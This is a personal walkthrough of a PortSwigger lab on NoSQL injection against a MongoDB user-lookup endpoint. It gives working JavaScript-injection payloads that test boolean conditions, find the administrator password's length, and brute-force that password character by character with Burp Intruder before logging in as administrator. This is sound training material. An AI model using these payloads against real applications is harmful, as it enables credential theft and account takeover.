[This lab](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-extract-data) simulates a scenario where a NoSQL injection vulnerability in a **MongoDB-powered user lookup endpoint** allows us to extract the administrator’s password **one character at a time**. By injecting JavaScript logic into the query, we use **boolean-based conditions** to infer password content.
##### Step 1: Confirm Injection in Lookup Endpoint
Logged in as `wiener:peter`.
Captured this request in **Proxy > HTTP history**:
```
GET /user/lookup?user=wiener
```
Sent to **Repeater**, changed to:
```
/user/lookup?user=wiener'
```
→ Response: **Syntax error** ✅
Tested a safe payload:
```
/user/lookup?user=wiener'+'
```
(URL-encoded as `wiener%27+%27`)
→ Response: user details returned ✅
Confirms that we are injecting into a live JavaScript query.
![[CleanShot 2025-04-14 at 20.52.04.png]]
---
##### Step 2: Confirm Boolean Injection
Injected a false condition:
```
wiener' && '1'=='2
```
Encoded: `wiener%27%20%26%26%20%271%27%3D%3D%272`
→ Response: **Could not find user**
Injected a true condition:
```
wiener' && '1'=='1
```
Encoded: `wiener%27%20%26%26%20%271%27%3D%3D%271`
→ Response: user details returned ✅
Injection working — response content differs based on boolean logic.
---
### 🔐 Step 3: Find Administrator Password Length
Used payload:
```
administrator' && this.password.length < 30 || 'a'=='b
```
Reduced number until false condition triggered.
Final result:
- `this.password.length < 9` → true
- `this.password.length < 8` → false
✅ Password is **8 characters** long
TIP:
You can easily modify the value in **Inspector**:
![[CleanShot 2025-04-14 at 20.53.48.png]]
##### Step 4: Launch Boolean Brute-Force Attack in Intruder
#### Set Up Payload:
Injected:
```
administrator' && this.password[§0§]=='§a§
```
Then **URL-encoded all characters**:
```
administrator%27%20%26%26%20this.password%5B§0§%5D%3D%3D%27§a§
```
- **Position 1** (index): 0 to 7
- **Position 2** (letter): a to z
Selected **Cluster bomb** attack type → Launched the attack
![[CleanShot 2025-04-14 at 21.11.01.png]]
---
##### Step 5: Extract Password
Sorted by **response length**.
At each character index (0–7), the correct letter causes the server to return **valid user info** (longer response).
Collected letters from position 2 for matching responses → Assembled password.
✅ Example result (will vary):
`zrmqcjpw`
---
##### Step 6: Log in as Administrator
Entered `administrator` and the extracted password in the login form.
→ Successfully logged in